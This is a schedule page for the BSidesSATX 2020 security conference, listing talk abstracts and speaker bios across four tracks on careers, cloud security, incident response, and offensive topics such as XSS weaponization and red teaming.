Presentations
Presentation and speaker details for BSidesSATX 2020 speaking tracks
TRACK 1: IN THE BEGINNING
09:00 - Cons & Careers
“If you compete with others, you may not win. If you compete with yourself, you always win by becoming better.” ― Debasish Mridha
How do you come across new ideas to keep things fresh? To borrow a saying, if you’re the smartest person in the room, you’re in the wrong room! Attending conferences is one way to learn about different viewpoints. Peeking into points along a career path will demonstrate an approach to keeping an eye on constant growth, while watching out for warning signs for burn out. Compete against yourself and no one else. The point is, the introduction of new ideas is essential to keep adding value to ourselves and the things we do.
Steven Bernstein
09:30 - I had no idea what I was doing, but now you do
My transition from just enjoying computers, hobby hacking, to formal education and to full time employement in the information security space. It simplies and streamlines some of the skills I feel got me to where I am today and streamlines them so other don't have to learn the 'hard and slow' way.
Aaron Rubesh
Self starter who got into cyber security without really realizing it.
Self starter who got into cyber security without really realizing it.
10:00 - The World’s Prettiest (fake) Cyber Warfare Ops Center - and How I Built It
In collaboration with the San Antonio Museum of Science and Technology (SAMSAT) and the Institute of Electrical and Electronics Engineers (IEEE), I built a massive mockup of a cyber-warfare operations center (SOC). Overall, this was a very interesting project which solicits a very interesting talk.
Nilo Mackey
I'm Nilo Mackey, a 14 year old (unemployed for obvious reasons) CompTIA-certified network technician and IT tech, as well as a sophomore at ISA/LEE High School. Ever since I was a kid I have loved everything tech-related, and I have been learning/programming/building/tinkering for as long as I can remember. I have recently moved more and more towards cybersecurity, and it is a career field that I am very strongly interested in. I not only love both producing and consuming technology, but also love good art, making music, and (occasionally) playing airsoft/speedqb.
I'm Nilo Mackey, a 14 year old (unemployed for obvious reasons) CompTIA-certified network technician and IT tech, as well as a sophomore at ISA/LEE High School. Ever since I was a kid I have loved everything tech-related, and I have been learning/programming/building/tinkering for as long as I can remember. I have recently moved more and more towards cybersecurity, and it is a career field that I am very strongly interested in. I not only love both producing and consuming technology, but also love good art, making music, and (occasionally) playing airsoft/speedqb.
11:00 - Breaking Down Walls with Windows
Kali Linux, Black Arch, ParrotOS... Microsoft Windows? Taking penetration testing and red teaming to places they tend to shy away from while utilizing free open source software to build a powerful offensive Windows box. Anything you can do in Kali, you can do in Windows... Even installing Kali!
Alexander Klepal
Alexander Klepal is a researcher and Cybersecurity Expert with Booz Allen Hamilton. A nationally ranked “Penetration Tester” (2nd in CIAS Cyber Panoply Fall 2016), regionally ranked CCDC Competitor (2nd at SWCCDC Spring 2017), and most recently SANS GIAC GPEN certified penetration tester, Alexander continues to tinker and teach everyday. “It’s my mission in life to take the technology we all use every day and make them safer and more accessible to everyone, even if I have to pop a few boxes to do it!”
Alexander Klepal is a researcher and Cybersecurity Expert with Booz Allen Hamilton. A nationally ranked “Penetration Tester” (2nd in CIAS Cyber Panoply Fall 2016), regionally ranked CCDC Competitor (2nd at SWCCDC Spring 2017), and most recently SANS GIAC GPEN certified penetration tester, Alexander continues to tinker and teach everyday. “It’s my mission in life to take the technology we all use every day and make them safer and more accessible to everyone, even if I have to pop a few boxes to do it!”
11:30 - Deep dive into cloud DevOps through Infrastructure as Code
While infrastructure as code (IaC) offers a systematic way to build datacenter and enforce standards in the cloud, this powerful capability remains largely unharnessed. We analyzed 500,000 IaC templates on GitHub to study the security pitfalls commonly overlooked in the cloud infrastructure.
Jay Chen
Dr. Jay Chen is a cloud security researcher with Unit 42 at Palo Alto Networks. His current research focuses on the public cloud and cloud-native security. Before joining Palo Alto Networks, he was a researcher in Accenture Cyber Lab, where his research focused on the DevOps, Blockchain, and ICS security. In the past, he had worked on designing secure distributed data storage and data processing systems for mobile devices.
Dr. Jay Chen is a cloud security researcher with Unit 42 at Palo Alto Networks. His current research focuses on the public cloud and cloud-native security. Before joining Palo Alto Networks, he was a researcher in Accenture Cyber Lab, where his research focused on the DevOps, Blockchain, and ICS security. In the past, he had worked on designing secure distributed data storage and data processing systems for mobile devices.
13:00 - Threat Intelligence: How to Focus Fire on the Bad Guys Coming for Your Network
Defense teams have an extremely difficult task: protect their organization from all malicious actors, 24/7. For smaller/younger defense teams, this can be incredibly challenging. Where do you start? Who do you hunt for first, and how is that decided? My presentation aims to answer these questions.
Kyle Hubert
Network Analyst and Blue Team Lead for the USAF. Recently he has focused on how to improve the use of cyber threat intelligence, specifically looking to increase the effectiveness of smaller/newer threat hunter teams. Some of his other interests include improving his Red Team skills, hiking, and snowboarding.
Network Analyst and Blue Team Lead for the USAF. Recently he has focused on how to improve the use of cyber threat intelligence, specifically looking to increase the effectiveness of smaller/newer threat hunter teams. Some of his other interests include improving his Red Team skills, hiking, and snowboarding.
14:00 - From Kali and a Couple of VMs to NextGen Home Lab. An Approach to Practice and Develop your Skills
Can we put an entire small business infrastructure in one physical box at home? Let's find out
Bashar Shamma
Bashar is a Sr. Security Specialist at a Fortune 100 company. He is part of the blue team focusing on Threat Intel and Threat Hunting. Throughout his career, Bashar had the privilege of analyzing and responding to hundreds of detections for many organizations across various industries and provided technical guidance to prevent such incidents in the future. Bashar holds a Master's Degree in Information System Security, GCFE, GNFA, GCTI, GCIH. In his spare time, Bashar has a passion for building and testing various environments and solutions in his home lab.
Bashar is a Sr. Security Specialist at a Fortune 100 company. He is part of the blue team focusing on Threat Intel and Threat Hunting. Throughout his career, Bashar had the privilege of analyzing and responding to hundreds of detections for many organizations across various industries and provided technical guidance to prevent such incidents in the future. Bashar holds a Master's Degree in Information System Security, GCFE, GNFA, GCTI, GCIH. In his spare time, Bashar has a passion for building and testing various environments and solutions in his home lab.
15:00 - Mentoring 101
Ever been a Daniel in need of a Mr. Myagi? Are you ready to achieve greatness but with no real clue where to start? Finding a mentor is the first step, but knowing how to make the most of the time spent with your mentor makes the real difference. Join in on a conversation about identifying your person of influence and building a plan together from wax on, wax off to being carried away by the cheering crowd.
What can I expect to learn? There has been a push in our community to be active mentors. What is not explained, however, is how to foster a healthy and prosperous relationship that benefits both the mentor and the mentee. Together we will explore the different types of mentoring relationships, as well as setting goals, tracking progress, and getting the most out of these relationships. We will explore the types of mentoring relationships that exist. We will also learn how to set goals, track progress towards those goals and how to get the most out of a mentorship.
What can I expect to learn? There has been a push in our community to be active mentors. What is not explained, however, is how to foster a healthy and prosperous relationship that benefits both the mentor and the mentee. Together we will explore the different types of mentoring relationships, as well as setting goals, tracking progress, and getting the most out of these relationships. We will explore the types of mentoring relationships that exist. We will also learn how to set goals, track progress towards those goals and how to get the most out of a mentorship.
Ell Marquez
16:00 - Broken Arrow
I discuss how the BSides community can apply InfoSec and forensic practices to assist domestic abuse victims cutting the electronic cord to their abuser. I cover social media, iOT, printers, metadata, defeating surveillance- including weaponized PDFs & how our assistance can make a great change.
Will Baggett
Former Intelligence Community officer, current NATO SOF cyber trainer and volunteer of many BSides conferences. I was a SME for iOS and Mac forensics and now apply these skills to the private sector. SciaticNerd has the best twitter handle.
Former Intelligence Community officer, current NATO SOF cyber trainer and volunteer of many BSides conferences. I was a SME for iOS and Mac forensics and now apply these skills to the private sector. SciaticNerd has the best twitter handle.
TRACK 2: IN THE CLOUDS
09:00 - Climbing App Sec Mountains (and how to summit)
AppSec teams are often told to "shift left", or to be involved earlier in the software development life cycle. We will detail the ways that companies create their own roadblocks and how to help their application security team succeed by instead "shifting out". Inspired by middle-out compression.
Adam Schaal
Adam Schaal is a Principal Application Security Researcher with Contrast Security with an extensive background in both development and application security. He has experienced both sides of making and breaking applications so he can always relate to his audience. Adam enjoys contributing to information security projects such as the CTF platform redctf and the malicious cable implant O.MG-Cable. He is also very active in his local security community as a founder of Kernelcon, a mid-size information security conference, and DEF CON 402, a local DEF CON group. Adam works out of Omaha, Nebraska, one of the least likely places in the United States to encounter shark attacks or suffer altitude sickness.
Adam Schaal is a Principal Application Security Researcher with Contrast Security with an extensive background in both development and application security. He has experienced both sides of making and breaking applications so he can always relate to his audience. Adam enjoys contributing to information security projects such as the CTF platform redctf and the malicious cable implant O.MG-Cable. He is also very active in his local security community as a founder of Kernelcon, a mid-size information security conference, and DEF CON 402, a local DEF CON group. Adam works out of Omaha, Nebraska, one of the least likely places in the United States to encounter shark attacks or suffer altitude sickness.
10:00 - Agile Compliance and Risk Ops
Many companies adopt DevOps or Agile practices only to crash against compliance walls such as RMF, PCI-DSS, or even GDPR. After being a Agile Product Owner, I moved to security, driving RMF on a new Agile org. This session shares my experiences incorporating Agile as a U.S. Government contractor.
Mark Peters
Dr. Mark Peters, US Air Force retired, spent 22+ years as an intelligence operator and now works as a Security Engineer, Technica Corporation on a US Air Force cyber weapon system in San Antonio, TX. As a cybersecurity professional, he recently had the opportunity to watch Agile adoption on several government programs. He authored "Cashing in on Cyberpower" analyzing system-level- economic impacts of over 10 years of cyber-attacks. Still relatively new to named Agile and DevSecOps processes, he worked with many similar processes in the Air Force and remains excited by growth opportunities in Agile security practices.
Dr. Mark Peters, US Air Force retired, spent 22+ years as an intelligence operator and now works as a Security Engineer, Technica Corporation on a US Air Force cyber weapon system in San Antonio, TX. As a cybersecurity professional, he recently had the opportunity to watch Agile adoption on several government programs. He authored "Cashing in on Cyberpower" analyzing system-level- economic impacts of over 10 years of cyber-attacks. Still relatively new to named Agile and DevSecOps processes, he worked with many similar processes in the Air Force and remains excited by growth opportunities in Agile security practices.
11:00 - Modern Symmetric Encryption
Encryption has significantly changed over the past 20 years but most examples in textbooks and classes show the same encryption modes used from the '70s through the turn of the century. Modern browsers, APIs, and platforms use different and more secure methods to protect data. Let's dive into how!
Carl Mehner
Carl Mehner is an information security engineer who has spent the last decade working with the public key infrastructure, certificates, and secure protocols. He has also worked on standards and protocols, including the latest version of TLS and a round 1 submission to NIST's quest for a new symmetric encryption algorithm.
Carl Mehner is an information security engineer who has spent the last decade working with the public key infrastructure, certificates, and secure protocols. He has also worked on standards and protocols, including the latest version of TLS and a round 1 submission to NIST's quest for a new symmetric encryption algorithm.
13:00 - Fighting the Third Party Risk Monster
This talk will cover the main threats third parties such as vendors bring to your systems and networks and tips and tricks AKA best practices on how to tame the third party risk beast.
TonyH
Tony Howlett is a published author and speaker on various security, compliance, and technology topics. He serves as President of (ISC)2 Austin Chapter and is an Advisory Board Member of GIAC/SANS. He is a certified AWS Solutions Architect and holds the CISSP, GNSA certifications, and a B.B.A in Management Information Systems. Tony is currently the CISO at SecureLink.
Tony Howlett is a published author and speaker on various security, compliance, and technology topics. He serves as President of (ISC)2 Austin Chapter and is an Advisory Board Member of GIAC/SANS. He is a certified AWS Solutions Architect and holds the CISSP, GNSA certifications, and a B.B.A in Management Information Systems. Tony is currently the CISO at SecureLink.
14:00 - Incident Response is HARRRRRD… but it doesn’t have to be
So your EDR, AV, or other fancy shiny blinky lights security tools alerted you that Bobs Windows box has some suspicious activity.
Do you have the details you need to investigate or remediate the system? Can you quickly and easily investigate it?
Do you have the details you need to investigate or remediate the system? Can you quickly and easily investigate it?
Michael Gough
Michael is a Malware Archaeologist, Blue Team defender, Incident Responder and logoholic. Michael developed several Windows logging cheat sheets to help the security industry understand Windows logging, where to start and what to look for. Michael is a primary contributor to the Open Source project ARTHIR. Michael is also co-developer of LOG-MD, a free tool that audits the settings, harvests and reports on malicious Windows log data and malicious system artifacts. Michael also blogs on HackerHurricane.com on various InfoSec topics. Michael also is co-host of the “Brakeing Down Incident Response” BDIR Podcast to education on Incident Response daily tasks. Michael also ran BSides Texas for five years for the Austin, San Antonio, Dallas and Houston cons.
Michael is a Malware Archaeologist, Blue Team defender, Incident Responder and logoholic. Michael developed several Windows logging cheat sheets to help the security industry understand Windows logging, where to start and what to look for. Michael is a primary contributor to the Open Source project ARTHIR. Michael is also co-developer of LOG-MD, a free tool that audits the settings, harvests and reports on malicious Windows log data and malicious system artifacts. Michael also blogs on HackerHurricane.com on various InfoSec topics. Michael also is co-host of the “Brakeing Down Incident Response” BDIR Podcast to education on Incident Response daily tasks. Michael also ran BSides Texas for five years for the Austin, San Antonio, Dallas and Houston cons.
15:00 - Tradecraft vs. Toolkit: Who’s Truly Important and What’s Actually to Blame?
I've seen the impact of failing to make people skilled in the art of security, creating tool jockeys, instead. Without strong tradecraft, they won't get the banana when the button stops working. This is presenting the challenge of replacing skill with technology and offering strategies to fix it.
Logan "WALL-E" Waldenville
Logan "WALL-E" Waldenville is a calibrator-turned-cyber security specialist for the US Air Force. His eclectic background includes Cyber Threat Emulation, Tactics Development, Tool Validation/Development, Defensive Cyber Operations, Threat Hunting, Operations Planning, and Operator Training. Sgt Waldenville has spent the better part of a decade developing new hires of all sorts into skilled technicians and analysts. Logan holds certifications in Exploit Development/Advanced Penetration Testing, Windows Forensics, and Cyber Security Operations. WALL-E enjoys dabbling in language learning, both of the spoken and programming varieties, as well as leveraging his knack for odds-and-ends acquisition into unique solutions
Logan "WALL-E" Waldenville is a calibrator-turned-cyber security specialist for the US Air Force. His eclectic background includes Cyber Threat Emulation, Tactics Development, Tool Validation/Development, Defensive Cyber Operations, Threat Hunting, Operations Planning, and Operator Training. Sgt Waldenville has spent the better part of a decade developing new hires of all sorts into skilled technicians and analysts. Logan holds certifications in Exploit Development/Advanced Penetration Testing, Windows Forensics, and Cyber Security Operations. WALL-E enjoys dabbling in language learning, both of the spoken and programming varieties, as well as leveraging his knack for odds-and-ends acquisition into unique solutions
16:00 - Software Supply Chain Attacks and You
Open source is under attack, and you are too. Software supply chain attacks are getting easier, and happening more and more often. Learn how to protect yourself from them, and how we need to work together as an industry to prevent this type of attack all together.
Dan Lorenc
Dan Lorenc is a Software Engineer at Google focused on open source Cloud technologies. He leads an engineering team focused on making easier to build and deliver secure, reliable systems for Kubernetes. He created the Minikube, Skaffold, and Tekton open-source projects, and is a member of the Technical Oversight Committee for the Continuous Delivery Foundation.
Dan Lorenc is a Software Engineer at Google focused on open source Cloud technologies. He leads an engineering team focused on making easier to build and deliver secure, reliable systems for Kubernetes. He created the Minikube, Skaffold, and Tekton open-source projects, and is a member of the Technical Oversight Committee for the Continuous Delivery Foundation.
TRACK 3: IN THE THICK OF IT
09:00 - What Does It Take to Find a Job These Days?
Job search is always a bewildering endeavor. According to the Department of Labor, most professionals will have at least 15 jobs in their lifetime, and in our community, that number is almost double. It is a full-time job finding your next job, but we all don’t have that time to spare in our lives. You may think you have a handle on finding your next job but what really goes on in recruiting and hiring may surprise you. What are tools and strategies to always have on hand so that you can succeed rather than fail. Hear from a panel of recruiters on what they recommend job seekers do to stay in the game.
Panelists:
Kirsten Renner, Novetta
Rachel Bozeman, CenturyLink
Lisa Gregg, CPS Energy
Lones B. Seiber, IPSecure Inc.
Moderator: Kathleen Smith
Kathleen Smith, Chief Outreach Officer, ClearedJobs.Net/CyberSecJobs.Com, both veteran owned companies, she spearheads the community-building, and communications outreach initiatives catering to the both organizations’ many audiences including security cleared job seekers, cybersecurity candidates and military personnel. Kathleen has presented at several security conferences on recruiting and job search within the cyber security world to include BSidesLV, BSidesTampa, BSidesDE, FedCyber.
Kathleen volunteers in the cybersecurity community; she is the Director, HireGround, BSidesLV’s 2 day career track. Kathleen is well respected within the recruiting community, is the co-founder and Past President of recruitDC, the largest community of recruiters in the Washington DC area.
Kirsten Renner, Novetta
Rachel Bozeman, CenturyLink
Lisa Gregg, CPS Energy
Lones B. Seiber, IPSecure Inc.
Moderator: Kathleen Smith
Kathleen Smith, Chief Outreach Officer, ClearedJobs.Net/CyberSecJobs.Com, both veteran owned companies, she spearheads the community-building, and communications outreach initiatives catering to the both organizations’ many audiences including security cleared job seekers, cybersecurity candidates and military personnel. Kathleen has presented at several security conferences on recruiting and job search within the cyber security world to include BSidesLV, BSidesTampa, BSidesDE, FedCyber.
Kathleen volunteers in the cybersecurity community; she is the Director, HireGround, BSidesLV’s 2 day career track. Kathleen is well respected within the recruiting community, is the co-founder and Past President of recruitDC, the largest community of recruiters in the Washington DC area.
10:00 - Where to go next in your cybersecurity career? Advice for Transition Military Community Members
There’s no shortage of advice out there for transitioning veteran job seekers – unfortunately much of the advice tends to be cookie cutter tips focusing on the most basic of topics. This program will help transitioning veterans in the cyber security industry understand the hiring landscape, highlight the difference between the recruiters who put you in the service and ones working to help you land that first job as a civilian, as well as how to leverage job board and job fairs, including virtual events. We’ll even put some special emphasis on how to really build your professional network and manage a your transition from different geographical locations.
Bob Wheeler, Account Manager, ClearedJobs.Net
After 20 years in the Navy with the last three serving as a recruiter, Bob has been a veteran hiring advocate providing presentations and newsletter content to several organizations around the country including Recruiting Daily. As an Account Manager, he assists employers developing their recruiting strategies for hiring security cleared talents.
After 20 years in the Navy with the last three serving as a recruiter, Bob has been a veteran hiring advocate providing presentations and newsletter content to several organizations around the country including Recruiting Daily. As an Account Manager, he assists employers developing their recruiting strategies for hiring security cleared talents.
11:00 - Changing Employers? - When, why and how
Are you changing employers? Are you thinking about changing employers? Why would you make the move, and when does it make the most sense? Finally, in 2020, what steps should you take to make the move as easy as possible for all involved.
Paul Guido, CISSP, CCSP
I am a security professional at a San Antonio financial institution where I work as a Security Janitor.
I am a security professional at a San Antonio financial institution where I work as a Security Janitor.
13:00 - Putting Out the Fire: 4 Proven Strategies for Hiring and Retaining Security Talent
As an industry, we have a Layer 8 problem, and it's our own fault! We say there's a talent shortage, and that we need good people; but once we get them, we just burn them out, leaving a trail of dissatisfied and unhappy workers behind us. This talk covers key strategies to change that - let's go!
Frank McClain
Frank McClain is a US Army veteran of the first Gulf War, and an accomplished cyber investigator with deep experience in digital forensics and incident response. He has worked as a DFIR consultant, managed security operations for a national financial services firm, and is a threat analyst and training lead within the Detection Engineering team of the Red Canary CIRT.
Frank McClain is a US Army veteran of the first Gulf War, and an accomplished cyber investigator with deep experience in digital forensics and incident response. He has worked as a DFIR consultant, managed security operations for a national financial services firm, and is a threat analyst and training lead within the Detection Engineering team of the Red Canary CIRT.
14:00 - Infosec Jobsearch Best Practices
From grossly impossible job posts to ghosting recruiters, our community full of smart people find themselves stuck attempting to find their next career opportunity.
This talk walks through each stage from searching, networking, interviewing and negotiations with tips to increase chances of success.
This talk walks through each stage from searching, networking, interviewing and negotiations with tips to increase chances of success.
Kirsten Renner
Kirsten is the Sr Director of Recruiting at Novetta, an advanced analytics and full spectrum cyber security company. She studied HR Management at University of Maryland. After a short while working as a software developer, then help desk manager, she combined her love for technology and HR by becoming a Technical Recruiter and has been doing so for over 20 years. For the last decade, Kirsten has been primarily supporting the Information Security field, and is best known in the community for her volunteer activities especially her involvement in the Car Hacking Village from its inception!
Kirsten is the Sr Director of Recruiting at Novetta, an advanced analytics and full spectrum cyber security company. She studied HR Management at University of Maryland. After a short while working as a software developer, then help desk manager, she combined her love for technology and HR by becoming a Technical Recruiter and has been doing so for over 20 years. For the last decade, Kirsten has been primarily supporting the Information Security field, and is best known in the community for her volunteer activities especially her involvement in the Car Hacking Village from its inception!
15:00 - The Pentester Blueprint: A Guide to Becoming a Pentester
Pentesting is a very popular area of cybersecurity. While there are lots of resources on pentesting the subject of how to start a career has been overlooked. I share my experience of helping others get into pentesting. The experience I share is from mentor and teaching.
Phillip Wylie, CISSP, GWAPT, OSCP
Phillip Wylie is a Penetration Tester, Adjunct Instructor at Richland College, and The Pwn School Project founder. Phillip has over 22 years of experience in InfoSec and IT. He has performed pentests on networks, wireless networks, applications, including mobile web apps. Phillip has a passion for sharing, mentoring and educating. This passion motivated him to start teaching and founding The Pwn School Project. The Pwn School Project a free monthly educational meetup with a focus on ethical hacking. Phillip teaches Ethical Hacking and Web Application Pentesting at Richland College in Dallas, TX.
Phillip Wylie is a Penetration Tester, Adjunct Instructor at Richland College, and The Pwn School Project founder. Phillip has over 22 years of experience in InfoSec and IT. He has performed pentests on networks, wireless networks, applications, including mobile web apps. Phillip has a passion for sharing, mentoring and educating. This passion motivated him to start teaching and founding The Pwn School Project. The Pwn School Project a free monthly educational meetup with a focus on ethical hacking. Phillip teaches Ethical Hacking and Web Application Pentesting at Richland College in Dallas, TX.
16:00 - Leading, Managing and Succeeding Remotely
Security has always been a discipline that is amenable to remote work. But even those who have spent time in remote cultures weren't prepared for the quantity and level of remoteness of the past few months. In this talk, Mike will talk about the challenges and opportunities in managing a remote team, including understanding how to hire and recruit, onboard new members of the team and manage for team cohesion and engagement.
Mike Murray, Founder, Scope Security
Mike has built global information security programs and has a proven track record of implementing pragmatic and results-driven security organizations which balance risks against business imperatives and rewards. He has always taken a "talent first" approach, surrounding himself with great people (who really deserve all the credit) and doing what I could to enable them and our business partners to execute on information security outcomes from a business focus.
Mike is currently the Founder of Scope Security focusing on information security in the healthcare field. His past positions have included CSO, Lookout and Director Product Development Security for GE Healthcare.
Mike has built global information security programs and has a proven track record of implementing pragmatic and results-driven security organizations which balance risks against business imperatives and rewards. He has always taken a "talent first" approach, surrounding himself with great people (who really deserve all the credit) and doing what I could to enable them and our business partners to execute on information security outcomes from a business focus.
Mike is currently the Founder of Scope Security focusing on information security in the healthcare field. His past positions have included CSO, Lookout and Director Product Development Security for GE Healthcare.
TRACK 4: IN THE WEEDS
09:00 - Automating disk and memory evidence collection in AWS
During an incident, answers are needed quickly. Often this starts with evidence collection and log correlation. At Goldman Sachs, we have automated an event-driven cloud response platform that uses AWS native services to successfully collect disk and memory from compromised EC2 instances.
Ryan Tick
Vaishnav Murthy
Ryan Tick and Vaishnav Murthy are cloud security architects for Goldman Sachs, responsible for automating the detection, analysis, and reporting of security incidents in Goldman's public cloud environment. They work with the firmwide Security Incident Response Team to design and conduct purple team exercises and respond to tier 3 security incidents in the cloud. Prior to working at Goldman, they were digital forensics and incident response (DFIR) consultants that led high profile cybercrime investigations for Fortune 100 clients across the globe. They both hold various AWS and GIAC certifications and are GIAC advisory board members.
Vaishnav Murthy
Ryan Tick and Vaishnav Murthy are cloud security architects for Goldman Sachs, responsible for automating the detection, analysis, and reporting of security incidents in Goldman's public cloud environment. They work with the firmwide Security Incident Response Team to design and conduct purple team exercises and respond to tier 3 security incidents in the cloud. Prior to working at Goldman, they were digital forensics and incident response (DFIR) consultants that led high profile cybercrime investigations for Fortune 100 clients across the globe. They both hold various AWS and GIAC certifications and are GIAC advisory board members.
10:00 - Automating Binary Deobfuscation Processes: Dynamic Taint Analysis and Symbolic Code Execution
Our talk consists of:
- An implementation of a simple 32-bit stack machine which we use to virtualize "payloads".
- Control flow obfuscation on the binary using a generic obfuscator.
- Automated de-obfuscation of these binaries using Triton and Libdft.
And how the underlying methodologies work!
- An implementation of a simple 32-bit stack machine which we use to virtualize "payloads".
- Control flow obfuscation on the binary using a generic obfuscator.
- Automated de-obfuscation of these binaries using Triton and Libdft.
And how the underlying methodologies work!
Usama Saqib
I work as an R&D engineer at Trapmine, and I spend my time researching and building systems to perform automated malware detection and analysis. Recently, our focus has been to integrate automated deobfuscation facilities into the detection and analysis system. The talk I am presenting will discuss some of the approaches we have taken to try and manage this problem.
I work as an R&D engineer at Trapmine, and I spend my time researching and building systems to perform automated malware detection and analysis. Recently, our focus has been to integrate automated deobfuscation facilities into the detection and analysis system. The talk I am presenting will discuss some of the approaches we have taken to try and manage this problem.
Berk Cem Goksel
Bachelor of Fine Arts, Acting. Worked as a Penetration Tester for 5 years, before moving to STM A.S. as a cyber threat intelligence analyst. Dog love for 24 years.
Bachelor of Fine Arts, Acting. Worked as a Penetration Tester for 5 years, before moving to STM A.S. as a cyber threat intelligence analyst. Dog love for 24 years.
11:00 - Weaponized XSS - Moving Beyond Alert(1)
Alert(1): it's everyone's favorite cross-site scripting (XSS) payload, but that doesn't mean you have to stop there. In this talk, we will explore the variety of exploits we can weaponize after we've gotten that alert box to pop. From session hijacking to crypto mining, there are a multitude of ways to exploit your victim with this decades-old class of vulnerability. It's sometimes hard to get buy-in to correct XSS vulnerabilities because an alert box isn't a compelling risk - this talk shows how to weaponize flaws once they're found.
For offensive security pros, you will walk away with a few new tricks to add to your engagements. People on the defensive side will learn signatures to detect and alert on. And for everyone else, come find out why XSS always finds its way to the top of web vulnerability top 10 lists.
For offensive security pros, you will walk away with a few new tricks to add to your engagements. People on the defensive side will learn signatures to detect and alert on. And for everyone else, come find out why XSS always finds its way to the top of web vulnerability top 10 lists.
Ray Doyle
The man, the myth, the legend; Ray Doyle, OSCE, OSCP, GXPN, aka @doylersec is an avid pentester and security enthusiast. He now works as a Senior Staff Adversarial Engineer at Avalara, and has been there for over six months now. You can also visit his blog at https://www.doyler.net, where he has been posting for over four years now!
When he's not hacking for work he's, well, hacking for fun as well...Ray has attended various security conferences for the past few years now, and has even spoken at CarolinaCon, BSides Manchester, BrrCon, BSides Denver, and BSides Raleigh/RDU. He has competed in numerous hacking competitions and CTFs over the years, most recently with Team Eversec, and managed to place 1st in the DerbyCon 9 CTF, 1st in the DEF CON 24 SOHOpelessly Broken CTF (winning a DEF CON 'black badge'), and 1st in the DEF CON 25 Wireless CTF (helping to win another black badge).
Other than security, you can always hit him up in City of Heroes (@doyler) or a Super Smash Brothers Melee money match.
The man, the myth, the legend; Ray Doyle, OSCE, OSCP, GXPN, aka @doylersec is an avid pentester and security enthusiast. He now works as a Senior Staff Adversarial Engineer at Avalara, and has been there for over six months now. You can also visit his blog at https://www.doyler.net, where he has been posting for over four years now!
When he's not hacking for work he's, well, hacking for fun as well...Ray has attended various security conferences for the past few years now, and has even spoken at CarolinaCon, BSides Manchester, BrrCon, BSides Denver, and BSides Raleigh/RDU. He has competed in numerous hacking competitions and CTFs over the years, most recently with Team Eversec, and managed to place 1st in the DerbyCon 9 CTF, 1st in the DEF CON 24 SOHOpelessly Broken CTF (winning a DEF CON 'black badge'), and 1st in the DEF CON 25 Wireless CTF (helping to win another black badge).
Other than security, you can always hit him up in City of Heroes (@doyler) or a Super Smash Brothers Melee money match.
13:00 - Securing AND Pentesting the Great Spaghetti Monster (k8s)
Oh sure, Kubernetes is the Bomb! But is it secure out-of-the-box? Oh hell no! Let's see if we can change that. Let's start with a live Kubernetes cluster running on a stack of PIs (there are visuals) So we have an app and we deploy it, but before we do that, let's make sure our cluster is secure.
rnbwkat
Based in Pittsburgh and a natural creature of winter, you can typically find me sipping Grand Mayan Extra Anejo whilst simultaneously defending my systems using OSS, magic spells and Dancing Flamingos. Honeypots & Refrigerators are a few of my favorite things! Fun Fact: I currently own 35 Raspberry Pis and I am an alien - not sure which planet though. (yes, I am weird)
Based in Pittsburgh and a natural creature of winter, you can typically find me sipping Grand Mayan Extra Anejo whilst simultaneously defending my systems using OSS, magic spells and Dancing Flamingos. Honeypots & Refrigerators are a few of my favorite things! Fun Fact: I currently own 35 Raspberry Pis and I am an alien - not sure which planet though. (yes, I am weird)
14:00 - Automating Attacks Against Google Home Device Provisioning
Google Home (and other similar home assistant) devices have an out-of-box provisioning process. The talk will demo secure points as well as a new automated tool for tricking an already setup device into reprovisioning to the attacker's network.
Rodney Beede
Originally I was a software engineer writing enterprise-scale distributed web applications. Computer security started as a hobby and turned into a full-time career when I discovered the web code I was writing could be manipulated by attackers. My curiosity with web security lead me to a full-time career in hacking. I've also picked up lock picking as a hobby and enjoy introducing others to it.
Other talks and vulnerability research I have done: https://www.rodneybeede.com/curriculum%20vitae/bio.html
Originally I was a software engineer writing enterprise-scale distributed web applications. Computer security started as a hobby and turned into a full-time career when I discovered the web code I was writing could be manipulated by attackers. My curiosity with web security lead me to a full-time career in hacking. I've also picked up lock picking as a hobby and enjoy introducing others to it.
Other talks and vulnerability research I have done: https://www.rodneybeede.com/curriculum%20vitae/bio.html
15:00 - Overt Operations | When the Red Team gets in your Face!
We talk covert operations all the time, but there’s more. What does an advanced red team do when their cover is blown? What changes do you make when the blue team already knows you're there? How do we operate overtly!?
In this talk, we delve into the specialized world of advanced red teaming. Here we move beyond the basics of an active directory domain and discuss methods to acquire freedom of maneuver within a target environment by leveraging all of the nuances that make each enterprise unique. We'll explore effects-driven operations and examine techniques to safely target Industrial Control Systems (ICS). Finally, advanced red teamers don't simply attack enterprises; they craft techniques to attack the enterprise defenses weaponizing them against the organization itself. The thing is... if the defenders already know you’re there, what could be better than making them think you’re everywhere!
Want a sneak preview of an in-development SANS class on advanced red teaming? Let's go!
In this talk, we delve into the specialized world of advanced red teaming. Here we move beyond the basics of an active directory domain and discuss methods to acquire freedom of maneuver within a target environment by leveraging all of the nuances that make each enterprise unique. We'll explore effects-driven operations and examine techniques to safely target Industrial Control Systems (ICS). Finally, advanced red teamers don't simply attack enterprises; they craft techniques to attack the enterprise defenses weaponizing them against the organization itself. The thing is... if the defenders already know you’re there, what could be better than making them think you’re everywhere!
Want a sneak preview of an in-development SANS class on advanced red teaming? Let's go!
Matthew Toussain CTO, Open Security Inc.
16:00 - Not my server C2: Using trusted sources for C2
I am not saying security is perfect but it is getting better. This requires offensive personnel to find crafty ways to gain remote communications to their clients. Instead of using your untrusted infrastructure, why not use trusted infrastructure approved by your target (**cough Slack)?
Brandon Helms
Brandon Helms currently serves as Rendition Infosec’s Chief Operations Officer and has dedicated most of his career to leading some of the most advanced cyber operations for both the DoD and private sector. Brandon was a Chief Petty Officer in the U.S. Navy where he ran IT and security operations for fast-attack submarines. Afterward, Brandon transitioned into an operator and technical director for the DoD. After his military career, Brandon entered the private sector as a Business Information Security Officer supporting the defense of numerous Nation States and Fortune 100 companies. Today, Brandon focuses most of his attention around exploit development, malware reversing, and training the next generation of cybersecurity professionals. When Brandon is not working, you can find him chillaxin with his daughter in San Antonio or on a mountain somewhere snowboarding.
Brandon Helms currently serves as Rendition Infosec’s Chief Operations Officer and has dedicated most of his career to leading some of the most advanced cyber operations for both the DoD and private sector. Brandon was a Chief Petty Officer in the U.S. Navy where he ran IT and security operations for fast-attack submarines. Afterward, Brandon transitioned into an operator and technical director for the DoD. After his military career, Brandon entered the private sector as a Business Information Security Officer supporting the defense of numerous Nation States and Fortune 100 companies. Today, Brandon focuses most of his attention around exploit development, malware reversing, and training the next generation of cybersecurity professionals. When Brandon is not working, you can find him chillaxin with his daughter in San Antonio or on a mountain somewhere snowboarding.
Daniel Gordon